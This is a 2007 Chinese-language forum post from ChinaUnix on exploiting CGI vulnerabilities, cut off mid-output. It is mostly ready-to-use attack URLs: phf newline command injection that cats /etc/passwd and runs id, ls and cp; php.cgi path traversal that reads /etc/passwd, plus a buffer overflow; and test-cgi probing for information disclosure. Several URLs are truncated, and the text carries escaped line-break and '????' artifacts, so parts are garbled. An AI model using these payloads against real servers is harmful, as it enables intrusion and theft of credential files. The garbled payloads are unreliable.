免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3455 | 回复: 0
打印 上一主题 下一主题

CGI漏洞的利用 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2007-11-05 09:45 |只看该作者 |倒序浏览
CGI漏洞向来是容易被人们忽视的问题,同时也是普遍存在的,前不久攻破PCWEEK \r\n???????? LINUX的黑客就是利用了CGI的一个漏洞。我就自己所知道的和从外国站点看来的一些CGI漏洞来写一些利用CGI的攻击方法,水平有限写得不对的地方请来信告诉我:bamboo@kali.com.cn \r\n\r\n\r\n\r\n???????? 一、phf.cgi攻击: \r\n\r\n???????? phf是大家所熟悉的了,它本来是用来更新PHONEBOOK的,但是许多管理员对它不了解以至于造 \r\n???????? 成了漏洞。在浏览器中输入: \r\n\r\n???????? http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd \r\n\r\n\r\n???????? 可以显示出PASSWD文档来。其实还可以用更好的命令来实现目的: \r\n\r\n???????? http://thegnome.com/cgi-bin/phf? ... Qemail=&Qnickna \r\n\r\n???????? me=&Qoffice_phone= \r\n???????? http://thegnome.com/cgi-bin/phf? ... ;Qalias=&Qname= \r\n\r\n???????? haqr&Qemail=&Qnickname=&Qoffice_phone= \r\n???????? http://thegnome.com/cgi-bin/phf? ... 0%7Esomeuser/passwd \r\n\r\n???????? %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= \r\n???????? http://thegnome.com/~someuser/passwd \r\n???????? http://thegnome.com/cgi-bin/phf? ... p;Qalias=&Qname \r\n\r\n???????? =haqr&Qemail=&Qnickname=&Qoffice_phone= \r\n\r\n???????? 以上等于执行了命令: \r\n\r\n???????? id \r\n???????? ls -la ~someuser \r\n???????? cp /etc/passwd ~someuser/passwd \r\n\r\n???????? (用普通的可以进入的目录来看passwd) \r\n\r\n???????? rm ~someuser/passwd \r\n\r\n\r\n???????? 二、php.cgi \r\n\r\n???????? 除了PHF以外,php也是常见的漏洞,php.cgi 2.0beta10或更早版本中,允许anyone以HTTP管 \r\n???????? 理员身份读系统文件,在浏览器中输入: \r\n\r\n???????? http://boogered.system.com/cgi-bin/php.cgi?/etc/passwd \r\n\r\n???????? 就可以看到想看的文件。 \r\n???????? 另外,一部分php.cgi还可以执行shell,原因是它把8k bytes字节放入128bytes的缓冲区中, \r\n???????? 造成堆栈段溢出,使得攻击者可以以HTTP管理员的身份执行。 \r\n???????? 但是只有PHP作为CGI脚本时才能实现,而在作为Apache模量是不能运行的。想检查能否运行, \r\n???????? 只要在浏览器中输入: \r\n\r\n???????? http://hostname/cgi-bin/php.cgi \r\n\r\n???????? 如果你看到返回这样的字样就可以运行: \r\n\r\n???????? PHP/FI Version 2.0b10 \r\n???????? ... \r\n\r\n\r\n???????? 三、test-cgi的问题 \r\n\r\n???????? test-cgi同样是个常常出现的漏洞,在浏览器中输入: \r\n\r\n???????? http://thegnome.com/cgi-bin/test-cgi?\whatever \r\n\r\n???????? 将会返回: \r\n\r\n???????? CGI/1.0 test script report: \r\n\r\n???????? argc is 0. argv is . \r\n\r\n???????? SERVER_SOFTWARE = NCSA/1.4B \r\n???????? SERVER_NAME = thegnome.com \r\n???????? GATEWAY_INTER
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP